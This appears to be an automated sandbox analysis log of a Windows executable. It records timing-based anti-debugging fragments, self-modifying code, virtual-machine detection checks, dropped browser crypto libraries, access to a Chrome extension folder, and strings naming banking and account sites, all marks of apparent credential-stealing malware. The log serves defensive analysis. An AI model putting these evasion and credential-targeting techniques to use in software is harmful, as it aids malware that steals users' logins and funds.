Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78B65 second address: C78B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ecx 0x00000009 jo 00007FBC8CB4EEE8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C78CAD second address: C78CB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7CE69 second address: C7CE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D159 second address: C7D16E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CC0CD41h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D16E second address: C7D17F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBC8CB4EEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D20E second address: C7D212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D212 second address: C7D26D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FBC8CB4EEE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000004h 0x0000002d jmp 00007FBC8CB4EEEDh 0x00000032 mov dx, 5E5Eh 0x00000036 push 6631E949h 0x0000003b pushad 0x0000003c push ebx 0x0000003d pushad 0x0000003e popad 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D513 second address: C7D5F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FBC8CC0CD44h 0x0000000f jmp 00007FBC8CC0CD3Eh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBC8CC0CD42h 0x0000001c pop edx 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FBC8CC0CD38h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr [ebp+122D265Fh], edi 0x0000003e push dword ptr [ebp+122D2894h] 0x00000044 jmp 00007FBC8CC0CD42h 0x00000049 call 00007FBC8CC0CD39h 0x0000004e jmp 00007FBC8CC0CD45h 0x00000053 push eax 0x00000054 jmp 00007FBC8CC0CD3Dh 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d jns 00007FBC8CC0CD42h 0x00000063 mov eax, dword ptr [eax] 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FBC8CC0CD49h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7D5F4 second address: C7D627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FBC8CB4EEE8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007FBC8CB4EEE8h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7F148 second address: C7F14E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: C7F14E second address: C7F158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546026D second address: 5460271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460271 second address: 5460277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460277 second address: 546027D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546027D second address: 5460281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460281 second address: 5460290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, bx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460290 second address: 54602C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FBC8CB4EEF8h 0x0000000a and al, 00000038h 0x0000000d jmp 00007FBC8CB4EEEBh 0x00000012 popfd 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54602C5 second address: 54602C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54602C9 second address: 54602E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54602E4 second address: 5460325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 4748CBBAh 0x00000008 pushfd 0x00000009 jmp 00007FBC8CC0CD3Bh 0x0000000e jmp 00007FBC8CC0CD43h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pop ebp 0x00000018 pushad 0x00000019 mov si, AA4Bh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FBC8CC0CD3Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546037C second address: 5460382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460382 second address: 5460386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B91979 second address: B91990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CB4EEF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B91990 second address: B91994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B91B40 second address: B91B46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: B91D98 second address: B91D9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54603D5 second address: 54603DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54603DB second address: 5460416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FBC8CC0CD40h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBC8CC0CD3Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460416 second address: 546041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460570 second address: 54605B4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBC8CC0CD48h 0x00000008 sbb al, 00000028h 0x0000000b jmp 00007FBC8CC0CD3Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov edx, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBC8CC0CD40h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605B4 second address: 54605B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605B8 second address: 54605BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605BE second address: 54605C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605C4 second address: 54605ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx ebx, si 0x00000013 push esi 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605ED second address: 54605FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBC8CB4EEEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54605FF second address: 5460638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edx] 0x0000000a jmp 00007FBC8CC0CD47h 0x0000000f inc edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBC8CC0CD45h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460638 second address: 546066B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FBC8CB4EEF8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546066B second address: 546066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546066F second address: 5460675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460675 second address: 5460638 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBC8CC0CCB0h 0x0000000f mov al, byte ptr [edx] 0x00000011 jmp 00007FBC8CC0CD47h 0x00000016 inc edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FBC8CC0CD45h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546072F second address: 546075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CB4EEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edi+01h] 0x0000000c jmp 00007FBC8CB4EEEEh 0x00000011 inc edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546075C second address: 5460760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460760 second address: 5460766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460766 second address: 546079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBC8CC0CD42h 0x00000009 and cl, 00000008h 0x0000000c jmp 00007FBC8CC0CD3Bh 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test al, al 0x00000019 pushad 0x0000001a mov si, C411h 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546079A second address: 54607AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 jne 00007FBCFD9171C5h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54607AC second address: 54607B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54607B0 second address: 54607B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54607B4 second address: 54607BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54607BA second address: 54607C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54607C0 second address: 5460858 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, edx 0x0000000d jmp 00007FBC8CC0CD40h 0x00000012 shr ecx, 02h 0x00000015 pushad 0x00000016 mov cl, D2h 0x00000018 call 00007FBC8CC0CD43h 0x0000001d mov si, A91Fh 0x00000021 pop eax 0x00000022 popad 0x00000023 rep movsd 0x00000025 rep movsd 0x00000027 rep movsd 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d pushad 0x0000002e call 00007FBC8CC0CD3Dh 0x00000033 mov ecx, 2118FA07h 0x00000038 pop ecx 0x00000039 popad 0x0000003a mov ecx, edx 0x0000003c jmp 00007FBC8CC0CD43h 0x00000041 and ecx, 03h 0x00000044 jmp 00007FBC8CC0CD46h 0x00000049 rep movsb 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460858 second address: 546085E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 546085E second address: 5460864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460864 second address: 54608BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000000f pushad 0x00000010 call 00007FBC8CB4EEF8h 0x00000015 movzx eax, di 0x00000018 pop edi 0x00000019 pushfd 0x0000001a jmp 00007FBC8CB4EEECh 0x0000001f sbb cx, E4D8h 0x00000024 jmp 00007FBC8CB4EEEBh 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, ebx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ebx, 57FB3DC6h 0x00000035 mov ax, dx 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54608BD second address: 54608D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 2AE52A95h 0x00000008 movzx esi, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [ebp-10h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54608D4 second address: 54608D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54608D8 second address: 54608EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBC8CC0CD42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54608EE second address: 54608F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 54608F4 second address: 546092B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], ecx 0x0000000f jmp 00007FBC8CC0CD49h 0x00000014 pop ecx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007FBC8CC0CD3Ah 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe RDTSC instruction interceptor: First address: 5460A77 second address: 5460ACF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FBC8CB4EEF1h 0x00000008 pop esi 0x00000009 mov dx, F594h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FBC8CB4EEF5h 0x00000019 pushfd 0x0000001a jmp 00007FBC8CB4EEF0h 0x0000001f or ax, F078h 0x00000024 jmp 00007FBC8CB4EEEBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: 9EF90A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: 9EF9DD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: B819F5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: BAD612 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe Special instruction interceptor: First address: C16A3E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\random.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\random.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\random.exe TID: 6444 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\random.exe TID: 6416 Thread sleep time: -32016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C98C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C98C930
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: random.exe, random.exe, 00000000.00000002.2551141119.0000000000B62000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: IIEHJKJJ.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: IIEHJKJJ.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: IIEHJKJJ.0.dr Binary or memory string: discord.comVMware20,11696487552f
Source: IIEHJKJJ.0.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: IIEHJKJJ.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: random.exe, 00000000.00000002.2551905997.0000000001597000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.2551905997.0000000001555000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: IIEHJKJJ.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: global block list test formVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: IIEHJKJJ.0.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: IIEHJKJJ.0.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: IIEHJKJJ.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: IIEHJKJJ.0.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: IIEHJKJJ.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: IIEHJKJJ.0.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: IIEHJKJJ.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: random.exe, 00000000.00000002.2551905997.000000000150E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: IIEHJKJJ.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: IIEHJKJJ.0.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: IIEHJKJJ.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: IIEHJKJJ.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: IIEHJKJJ.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: random.exe, 00000000.00000002.2551141119.0000000000B62000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: IIEHJKJJ.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
